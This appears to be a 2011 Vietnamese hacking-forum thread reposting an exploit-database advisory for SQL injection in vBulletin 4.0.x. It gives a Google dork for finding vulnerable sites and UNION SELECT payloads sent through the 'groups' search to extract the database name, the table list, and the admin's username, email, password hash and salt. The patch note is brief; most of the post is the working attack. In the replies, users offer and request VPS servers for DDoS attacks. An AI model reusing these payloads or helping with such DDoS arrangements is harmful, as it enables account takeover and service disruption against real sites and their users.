[Hacking] SQL Injection VBB 4.x.x

**interpol** · 24-05-2011, 08:34 PM

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
#[+] Discovered By : D4rkB1t
#[+] Site : 1337day.com Inj3ct0r Team
#[+] support e-mail : d4rkb1t@live.com

Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

Thank my friends from Inj3ct0r Team (1337day.com)

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger...
Or please watch this video to understand more: http://www.youtube.c...h?v=fR9RGCqIPkc

---------------------

vBulletin 4.X Security Patch

http://www.vbulletin...4495&PID=564936

================================================== ==================
# #
# 888 d8 888 _ 888 ,d d8 #
# e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
# d888 888 d888 888 888d8b 888 888b 888 888 #
# 8888 888 / 888 888 888Y88b 888 8888 888 888 #
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
# "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
# #
================================================== ==================

# 1337day.com [2011-05-21]

--------------------------------------------------
Xem các chủ đề cùng chuyên mục:

1 DVD tài liệu về hack và crack rất rất hay !!! 03/09/2009
Localattack Server: itnameserver.com 14/05/2009
Bài 1: Local với những lệnh cơ bản 26/05/2011
DVD giáo trình Hacker Mũ Trắng | HotFile | RS.Com 26/10/2009
[VideoTut] chiếm quyền admin VBB qua MySQL Dumper 16/11/2010
TCP Hijack - LAN 18/05/2009
Đọc trộm Yahoo Mail với Ferret, Cookie Editor & Cain 27/05/2009
[Hacking] SQL Injection VBB 4.x.x 24/05/2011
Login forum phpbb as admin 25/06/2011
ViDeo Fake IP 24/09/2009

**viethung_9x** · 26-05-2011, 02:37 PM

CÓ Bro nào cần vps để ddos không

**interpol** · 26-05-2011, 07:37 PM

Nguyên văn bởi viethung_9x

CÓ Bro nào cần vps để ddos không

.

Pri em chục con đi. Đang cần ^^!

Chủ đề: [Hacking] SQL Injection VBB 4.x.x

Ðiều Chỉnh

Display